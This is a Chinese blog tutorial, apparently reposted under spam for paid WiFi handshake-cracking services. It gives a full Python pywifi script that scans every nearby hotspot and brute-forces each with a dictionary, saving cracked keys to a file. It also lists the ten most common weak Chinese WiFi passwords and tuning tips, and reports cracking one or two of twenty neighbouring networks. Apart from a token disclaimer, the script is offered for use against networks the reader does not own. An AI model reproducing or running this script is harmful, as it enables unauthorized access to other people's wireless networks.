WiFi密码怎么破?一个Python脚本搞定

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

  1. from pywifi import *

  2. import time

  3. import sys

「短暂」的春节假期已经结束了,想必今天大家都已经开始工作了。新的一年,我们一起继续学习Python,鸡年雄起~~本文仅供大家参考,请不要滥用哦。

原文:环境准备

首先,这个模块在Windows下有点鸡肋,作者在调用WLANAPI时没有对WLANSECURITYATTRIBUTES进行封装,所以推荐在Linux下运行。我测试所使用的是Kali 2.0自带的Python 2.7.6,可以直接通过pip install pywifi安装。

导入模块

这里只用到了三个模块。需要修改pywifi的wifiutillinux.py脚本中sendcmdtowpas方法中的if reply != b’OKn’判断,否则会有很多提示信息。

  1. def main():

  2.    #扫描时常

  3.    scantimes = 3

  4.    #单个密码测试延迟

  5.    testtimes = 15

  6.    output = sys.stdout

  7.    #结果文件保存路径

  8.    files = "TestRes.txt"

  9.    #字典列表

  10.    keys = open(sys.argv[1],"r").readlines()

  11.    print "|KEYS %s"%(len(keys))

  12.    #实例化一个pywifi对象

  13.    wifi = PyWiFi()

  14.    #选择定一个网卡并赋值于iface

  15.    iface = wifi.interfaces()[0]

  16.    #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置

  17.    scanres = scans(iface,scantimes)

  18.    #统计附近被发现的热点数量

  19.    nums = len(scanres)

  20.    print "|SCAN GET %s"%(nums)

  21.    print "%sn%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s n%s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)

  22.    #将每一个热点信息逐一进行测试

  23.    for i,x in enumerate(scanres):

  24.        #测试完毕后,成功的结果讲存储到files中

  25.        res = test(nums-i,iface,x,keys,output,testtimes)

  26.        if res:

  27.            open(files,"a").write(res)

字典准备

效率很重要,毕竟这个东西跑起来真的很慢。下面是中国常用的wifi弱口令TOP 10:

12345678
123456789
88888888
1234567890
00000000
87654321
66668888
11223344
147258369
11111111

配置扫描器

推荐将扫描时间设置在15-20秒之间。测试时间可以自定义,考虑到认证速度和距离的关系,我一般设置在15左右,再长时间也没有意义。即使成功破解了热点,信号也不会很好。

  1. def scans(face,timeout):

  2.    #开始扫描

  3.    face.scan()

  4.    time.sleep(timeout)

  5.    #在若干秒后获取扫描结果

  6.    return face.scan_results()

  1. def test(i,face,x,key,stu,ts):

  2.    #显示对应网络名称,考虑到部分中文名啧显示bssid

  3.    showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid

  4.    #迭代字典并进行爆破

  5.    for n,k in enumerate(key):

  6.        x.key = k.strip()

  7.        #移除所有热点配置

  8.        face.remove_all_network_profiles()

  9.        #讲封装好的目标尝试连接

  10.        face.connect(face.add_network_profile(x))

  11.        #初始化状态码,考虑到用0会发生些逻辑错误

  12.        code = 10

  13.        t1 = time.time()

  14.        #循环刷新状态,如果置为0则密码错误,如超时则进行下一个

  15.        while code!=0 :

  16.            time.sleep(0.1)

  17.            code = face.status()

  18.            now = time.time()-t1

  19.            if now>ts:

  20.                break

  21.            stu.write("r%-*s| %-*s| %s |%*.2fs| %-*s |  %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("n","")))

  22.            stu.flush()

  23.            if code == 4:

  24.                face.disconnect()

  25.                return "%-*s| %s | %*s |%*sn"%(20,x.ssid,x.bssid,3,x.signal,15,k)

  26.    return False

无线密码字典

扫描周围热点

热点测试

这里建议将扫描过程的数据存入数据库,以防止重复扫描,并且更加直观。

案例

本次测试使用了11个弱口令,并扫描到了20个热点,然后开始耗时的破解过程。

结果还不错,大家的安全意识不像以前那么薄弱了,扫描出了一两个热点,其中一个还是自家的热点。- – 传送门

赞(0)